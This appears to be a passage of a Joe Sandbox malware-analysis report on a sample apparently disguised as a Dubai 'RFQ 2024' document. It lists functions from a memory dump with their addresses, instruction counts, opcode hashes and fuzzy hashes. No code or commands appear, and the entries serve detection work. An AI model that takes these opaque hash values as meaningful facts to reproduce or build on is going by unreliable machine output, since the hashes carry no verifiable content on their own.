Opcode ID: 3a330ed7ea655d71dd4bed34469b5c9d3971825b19a448a40de0f01e8c52a13d
Instruction ID: c2d9ddebcaa2891209b65300b15b0aa38fabaf4bc8bd13f738def4d81c3ec79c
Opcode Fuzzy Hash: 3a330ed7ea655d71dd4bed34469b5c9d3971825b19a448a40de0f01e8c52a13d
Instruction Fuzzy Hash: C421AF712016059FC719DF59C840A66BBB9FF96361F1181ADE1068B290E770EC01CF94

Function 01639580 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb22eb190cd357f9b24113d99044f5f6e91e488c922183913c173fc12c535f76
Instruction ID: f14b1545cc68894912468e4694a295e58bfe2930b1ece35867ba02adef8c3b45
Opcode Fuzzy Hash: bb22eb190cd357f9b24113d99044f5f6e91e488c922183913c173fc12c535f76
Instruction Fuzzy Hash: CC21E271504602DBCB366F29CC14B2637A2FF90338F24465DE457466E5D771E882CFA5

Function 01622755 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c12d8f095fc74d7fcc978ef6421e16ccf73e2a469728a8b54082dc63ecc7a27e
Instruction ID: f53eb3f79c79364241fe050bf3744e75995f13e399d3ef9b98cc6d957a111c8c
Opcode Fuzzy Hash: c12d8f095fc74d7fcc978ef6421e16ccf73e2a469728a8b54082dc63ecc7a27e
Instruction Fuzzy Hash: 78213B31749A919BF323576CCD54F347BDAAB45B30F1807A8EA21AB7D2D7688801C604

Function 0163A22B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d7147d8fe3ecdbab84ed5b960c5fa782c7ad834c27afff6424bae5fb391bec2
Instruction ID: 78acceb47faed698212a83828fa246489839ba5c61e0691de18e62d8663fafa8
Opcode Fuzzy Hash: 6d7147d8fe3ecdbab84ed5b960c5fa782c7ad834c27afff6424bae5fb391bec2
Instruction Fuzzy Hash: 5D219875600A11AFC725DF69CC00B56B7F5BF48B14F28846CE55ACBB62E331E842DB98

Function 016805C6 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bde52a38f93f5a606e910d6f1a6618ee170db7cd53ecc50a6cdea0a7e827cfe
Instruction ID: 44d96ea18a510ad3875af1682b5f4bd7e57fcea71e2bbd70dfe3f326ce35a4a6
Opcode Fuzzy Hash: 0bde52a38f93f5a606e910d6f1a6618ee170db7cd53ecc50a6cdea0a7e827cfe
Instruction Fuzzy Hash: CF21E3B1E00219ABCB24DFAAD981AAEFBF9FB98700F10422EE505A7250D7709945CB54

Function 016214C9 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
Instruction ID: ee2f8bad354841c2d52c212ec3ae03f67334cea13caec825100f437259a795a1
Opcode Fuzzy Hash: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
Instruction Fuzzy Hash: 9E210C71245AA18BE7229BADCD40B217BEEBF45654F0D00E0EE02AB392E768CC41CB50

Function 015FB705 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3aa7f075ef9877d1a0edb5c861b26621e84c9eb8c303eaa5aeafabe871d05b7
Instruction ID: 3246382d2257aa0b72b778fe5ea4af4c2bc7f86f545fe2c6e06015a1d213fbde
Opcode Fuzzy Hash: a3aa7f075ef9877d1a0edb5c861b26621e84c9eb8c303eaa5aeafabe871d05b7
Instruction Fuzzy Hash: F8217532101A42DFC722EF18CD10F19B7B6FB28718F18492CE1068B661CB34E841CB88

Function 01630044 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
Instruction ID: 1da3de2f8b1e1c6d483b7e2a3793c4fbae3408a7fbf062d7f403c4043fe77e8e
Opcode Fuzzy Hash: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
Instruction Fuzzy Hash: 8D119D72600A05AFE7229F98DC45F9EBBA9EBD4754F10402AFB019B240D771E949CB64

Function 01608009 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b3c6feef7647843d98110b3448f52ddb40374b3e0d99e181955fde0d5504fc
Instruction ID: 2f35884bcf2995657b9ca5ae7b0b6aa4eb774d0b071874b1e04ac1d41e764f82
Opcode Fuzzy Hash: 20b3c6feef7647843d98110b3448f52ddb40374b3e0d99e181955fde0d5504fc
Instruction Fuzzy Hash: 17215E75A00205DFCB19CF58C990A6EBBB9FB88714F24416DD106A7354C771AD06CBD0

Function 015F91F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda03c509337bf6f10ab17268eda262be6189ae59588f42577d5cb370ae9bd6e
Instruction ID: e3d19869f7f2d0415d61f8f8f0ee0f2d844d7b6b39719af5be57a42ef15f0bfb
Opcode Fuzzy Hash: eda03c509337bf6f10ab17268eda262be6189ae59588f42577d5cb370ae9bd6e
Instruction Fuzzy Hash: 4511017B012541AAD7359F55EE41B72B7E9FBA8B80F10202DE900D7354E734CD12C769

Function 01696400 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f1607914688b2a457616f935dc8b1b43d2a9c882862fa6a294db0f2e01a74a5
Instruction ID: 27124ec783e075af63b59c3d6f9cca454f7f41b550cae3255919b00ea23b6f69
Opcode Fuzzy Hash: 7f1607914688b2a457616f935dc8b1b43d2a9c882862fa6a294db0f2e01a74a5
Instruction Fuzzy Hash: A1119132282601ABCB22DB9DDD40F5A77AEEB55F64F018069F6059B251DA70E901C794

Function 0162E7E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ac935daeeba76bccef0e1f6d3fe01f17c981e5059690ec7e4304acab00d33f
Instruction ID: 14e0219edff015e162bb5b76e2f1dd851883af3580b00ab10cf4a04cb2113344
Opcode Fuzzy Hash: a3ac935daeeba76bccef0e1f6d3fe01f17c981e5059690ec7e4304acab00d33f
Instruction Fuzzy Hash: 1B1104327005509BCB29DB29DC91A3F729BEBE5774B29413DEA138B394EA719C02C794

Function 016365D0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64fb92b953cdaa4045be062a3603658509026cb1013fa6a034c0726bb327b494
Instruction ID: eeda72b09cfdc5bfa5775d80ff6e0033296ae5c862ca33ccac8a9d1194179c35
Opcode Fuzzy Hash: 64fb92b953cdaa4045be062a3603658509026cb1013fa6a034c0726bb327b494
Instruction Fuzzy Hash: 8C11BF72A01215ABCB21CF59CD80A5ABBE5ABA6690F15407DD9059B311D730DE01DBA4

Function 016CA464 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
Instruction ID: 0855ec37fff89ebc7cf4218e0ccef4c74777dbb6eda23b7aec9e1972ceb7fb92
Opcode Fuzzy Hash: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
Instruction Fuzzy Hash: 8111C432A00919AFDB19CF58CC05BADFBB6EF84710F05826DEC5697380E671AD51CB84

Function 0162270D Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a28a8a2b2467c5ece1688c3282267918bfd3d9b664339a173dff0a07f41f2854
Instruction ID: 2c2b0a9a32848848175a9ffaf09f087f68201bd5a6596d178aaab28096253d94
Opcode Fuzzy Hash: a28a8a2b2467c5ece1688c3282267918bfd3d9b664339a173dff0a07f41f2854
Instruction Fuzzy Hash: 6A0149353496909BE32696AEDC94F377BDEEF80350F09046EF9018B390DB54DC01C261

Function 016BD270 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4384220c295f4d3e533a6fcae8810504b2e89fc3e26a35c5d159139cdbb2224c
Instruction ID: 1f0c94fb2d0eb324fea3b7013af434fb72ea45905a5447eebcbbeb4f10b3172a
Opcode Fuzzy Hash: 4384220c295f4d3e533a6fcae8810504b2e89fc3e26a35c5d159139cdbb2224c
Instruction Fuzzy Hash: 06015E7161014AAB9B14DBE6CD86DEF7BBDEFD4668B14405AAA019B200EB30EA41C764

Function 016045B0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad544272c0a0ee1b1cf96019cca8cf51445e5ca5293b5a99427cdf1ad3c5ab6
Instruction ID: c95c410fc932bc7d194490cc298ccf9350d74b16c22cdf92cdadc3b6024a654c
Opcode Fuzzy Hash: 5ad544272c0a0ee1b1cf96019cca8cf51445e5ca5293b5a99427cdf1ad3c5ab6
Instruction Fuzzy Hash: A111CE726106A4EFD73ACF69DD80B177BA8EB84B64F044119FA048B780DB70E801CBA4

Function 01636540 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aab55aa5d19693f663c36a0d0bea5f97eab2265a28e99d4d008c745adefb8db7
Instruction ID: 4df0dd4a18ed8bf8ff0051e1977e686852c99e962ce739d3048c2e35366e01c4
Opcode Fuzzy Hash: aab55aa5d19693f663c36a0d0bea5f97eab2265a28e99d4d008c745adefb8db7
Instruction Fuzzy Hash: 2A11A072900615BBDB219B58CD80B5EFBB9FF88720F140469DA0267384D770AE008B90

Function 015F72E0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9130d544ff9d5d6a39308d23f168a36faaf8c4e1268cd35f546ae685fc39e186
Instruction ID: be851205b8dada53870c3860fb30b0a8ccd11863fce861e05ac505a814414b80
Opcode Fuzzy Hash: 9130d544ff9d5d6a39308d23f168a36faaf8c4e1268cd35f546ae685fc39e186
Instruction Fuzzy Hash: 5411AC72A00604AFE721CF68CC42F6B7BE8FB49344F05486DEA86CB251D735EC018BA4

Function 0162E45E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
Instruction ID: d47fb82ffb2951136a1e024258b2bc428bacf7727e4e7519a424f3fd840b5899
Opcode Fuzzy Hash: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
Instruction Fuzzy Hash: E311A532646AA18BE723871DDD64B257BECBB41B68F1A00F8DD018B742D729D841CB95

Function 01633740 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57c604e2769d24b3595e6857c4d6c0370f14f7820c98c0d109b6f54e1e29325
Instruction ID: 000bd970934bccc403420d108bd1075eefc0b609061501e29100b0b10f41e775
Opcode Fuzzy Hash: f57c604e2769d24b3595e6857c4d6c0370f14f7820c98c0d109b6f54e1e29325
Instruction Fuzzy Hash: CB115BB5A0424ADFD745CF19D840A95BBF5FF49310F08829AE848CB301D735EC91CBA4

Function 0162F1F0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ea4d848b1084d87640fa919ca40fb50527d57abf5904c3e81efe8aac07951c4
Instruction ID: 637b6709afdafd799b51b74c48263458d8559ba47d90ba24901969b6b9039ee7
Opcode Fuzzy Hash: 5ea4d848b1084d87640fa919ca40fb50527d57abf5904c3e81efe8aac07951c4
Instruction Fuzzy Hash: AA11E575601658AFC720DFA9DC44BAABBB8FF55610F1400BAE901EB742DB34D901CB50

Function 015FA200 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
Instruction ID: 52f5b0efd77d1377b3a34ada2e9478155bbbbd83b537d430a425fa4f76692871
Opcode Fuzzy Hash: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
Instruction Fuzzy Hash: 7E01D6766057219BCB328F19D840A267BE8FF55770700892DFD998F691D731D501CBA1

Function 01606179 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f987b6d68e31b95574440b26ce1f20ce90ce439712e177c71a5aedc8e43bae
Instruction ID: cbbd4c042af9d267cc9ee9d08f1bdd09369e04a746a678b3194468662e780893
Opcode Fuzzy Hash: 91f987b6d68e31b95574440b26ce1f20ce90ce439712e177c71a5aedc8e43bae
Instruction Fuzzy Hash: D111AC30641228ABDB36EB28CC52FE97275BF04710F2041E8B719A61E0DB309ED1CF88

Function 0168C490 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368ea6db0bc6523cf64c1860193ec9ab1f33b738a60c0acd4abec51c790d57ff
Instruction ID: 4c5b61cb5673d2f2fbf9fa5e885625b66e78f632b47f421e25e80a37d4e50fd6
Opcode Fuzzy Hash: 368ea6db0bc6523cf64c1860193ec9ab1f33b738a60c0acd4abec51c790d57ff
Instruction Fuzzy Hash: 5B11E8B1A012599FCB04DFADD941AAEBBF8FF58210F14406AB905E7341D674AA01CBA4

Function 01642010 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6b6acd379a4ae67db65abb7e0534ade4db65e8afdc9f2dc1d66385e3260568
Instruction ID: 0d27c58dddafd595506ad6f0ba32de67ceb4f625303415e0cd75b69d495c7330
Opcode Fuzzy Hash: 5e6b6acd379a4ae67db65abb7e0534ade4db65e8afdc9f2dc1d66385e3260568
Instruction Fuzzy Hash: 9911AD31A00209EFCB14DF68DC50FAE7BB6EB44714F10409DF9119B380DB35A915CB90

Function 0163E4EF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ccd6ced917dd24712ca51ff852f9aeab5246a5dd6ad7f1ceed0daa5b441ac5
Instruction ID: 3d812bf539429a1569b4eb2cf9bc806beef348f62bd0fdf567cf280b7cbc865f
Opcode Fuzzy Hash: 06ccd6ced917dd24712ca51ff852f9aeab5246a5dd6ad7f1ceed0daa5b441ac5
Instruction Fuzzy Hash: 3201F271201A46BFC321AB79CC80E13B7ADFFA4764B04012DB20583650DB24EC01CAF8

Function 015F9303 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
Instruction ID: c9949e282b2f7ed9d7dfd92d00a8931eba676a1182bbf1cf24548cdcd5b3961b
Opcode Fuzzy Hash: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
Instruction Fuzzy Hash: 8B118E32850A029FD7319F09C880B26B7E1FB54726F19886DE6894E5E6C374E880CB10

Function 0168C5FC Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c77d35908ceeb28776507fd49331d70ed602c812e17ca5d42e7358bcbdd6c0a
Instruction ID: 0f6af501be36e3a7bcd6698d7fe49ed1246665cf00d7d52aaaea612dcc35275a
Opcode Fuzzy Hash: 5c77d35908ceeb28776507fd49331d70ed602c812e17ca5d42e7358bcbdd6c0a
Instruction Fuzzy Hash: 9C113CB1608704DFC700DF69D841A5BBBE4EF98714F00455EB958D7351D630E910CBA6

Function 016BF13E Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e94bd2bb638726c6099797580206f96b6f351c74486db830888c0d2aef8ad0cf
Instruction ID: 7e7dc7ccb74fbd24e9bc8666ece2084f5cf5c65cbfc8c291e99f87dec078d410
Opcode Fuzzy Hash: e94bd2bb638726c6099797580206f96b6f351c74486db830888c0d2aef8ad0cf
Instruction Fuzzy Hash: 0901B170A00208EFCB04EFA9DC41FAEBBB8EF44704F00446AB900EB381DA74DA01CB94

Function 0163D0F0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
Instruction ID: 6b2160462345285d270f47fb93a6df5f7e1141f66caa288780f32ad3724c9cab
Opcode Fuzzy Hash: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
Instruction Fuzzy Hash: 93012632A04644EBDB129B98CC00F2977BAEBC0A79F554159EE158B381DF34DD01C795

Function 016232C5 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
Instruction ID: e5b0d38812921aac47e012fe6feaf3f634552cbe9ff22b6009805c2b4df1a57d
Opcode Fuzzy Hash: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
Instruction Fuzzy Hash: 60018632700965A7CB11DA5ADE00A5F7BBDBFC8750B440429FA15D7750DF34DE118BA4

Function 016BF582 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a8e7aadbce8968723bf08bd9c463d611a30c0ed2e59d1049cb83c28fd96ebf6
Instruction ID: 5b39926a9d051b9cc0573ff05f2dcc12f6f204f60c945425a3797f6895ff8dee
Opcode Fuzzy Hash: 4a8e7aadbce8968723bf08bd9c463d611a30c0ed2e59d1049cb83c28fd96ebf6
Instruction Fuzzy Hash: 1F01B171A41209EFCB14EFA9DC45FAEBBB8EF54710F00406AB900EB380DA74DA01CB94

Function 016BF478 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c05db54cdafe146ab2e6081bd3e9f9f615cff029426f815047cce9551cb7c23
Instruction ID: d535bdbc0f5d94d35f397ba395c3d67a2b4946805447f943c6bba7298ecd13a1
Opcode Fuzzy Hash: 5c05db54cdafe146ab2e6081bd3e9f9f615cff029426f815047cce9551cb7c23
Instruction Fuzzy Hash: 3301B571A41209EFCB04EFA9DC45EAEBBB9EF44710F00409AF900EB381D674DA00C794

Function 016BF4FD Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ead3a8a64d17356ecd58d1b4be43bd42c670777df0f6214f30878a9eca28a5a
Instruction ID: 95b7a5b2faa2d3dc9ae292f408416223a2f415efcda4a638ababb43d6028eb3b
Opcode Fuzzy Hash: 2ead3a8a64d17356ecd58d1b4be43bd42c670777df0f6214f30878a9eca28a5a
Instruction Fuzzy Hash: A501B171A00209EFCB14EFA9DC45FAEBBB8EF54710F00406AB910EB380DA74DA41CB94

Function 0163415F Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b297edff4fc099a3bff32253cdeb6cd41bdfdb700582702b4d1b6533766a5312
Instruction ID: a541235abdabd6971130e860956f68bf9f661ff10c38c8a2a6fb5798d7abc11c
